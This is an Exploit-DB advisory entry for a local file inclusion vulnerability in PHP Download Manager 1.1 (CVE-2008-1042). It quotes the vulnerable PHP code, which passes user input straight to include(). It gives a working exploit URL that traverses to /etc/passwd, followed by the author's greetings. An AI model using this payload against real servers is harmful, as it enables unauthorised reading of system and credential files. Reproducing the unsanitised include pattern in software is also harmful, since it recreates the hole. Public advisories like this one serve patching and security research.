PHP Download Manager 1.1 - Local File Inclusion

Author: BeyazKurt
type: webapps
platform: php
port: 
date_added: 2008-02-23  
date_updated: 2016-11-14  
verified: 1  
codes: OSVDB-42146;CVE-2008-1042  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comphpdlmgr_1_1.zip  

raw file: 5183.txt  
#####################################################
# Author : BeyazKurt
# Contact : Bey4zKurt@Gmail.Com
#
# Script : php Download Manager (v1.1 & 1.0)
# Risk : Local File Include
# Download : http://sourceforge.net/project/showfiles.php?group_id=185482
#
# File : include/body.inc.php
#
# Code :
#   <?php
#      if (file_exists($content)) {
#      include($content);
#      } else { echo "<p>This page has no content.</p>"; }
#   ?>
#
# Exploit :
#
#  Vuln.Com/include/body.inc.php?content=../../etc/passwd
#
#----------------------------
#
#                          INDEPENDENT KOSOVA (H)
#  ARNAVUT Olmak Ayrıcalıktır - Being An ALBANIAN Is A Priviledge
#
#                      15 Sehidimizin ruhu saad olsun...
#
#                            Www.Netkabus.Com
#
#  Not : I Love You Gulsum (F)
#  Thnx : Ekin0x - Fotosopar seni :D
#####################################################

# milw0rm.com [2008-02-24]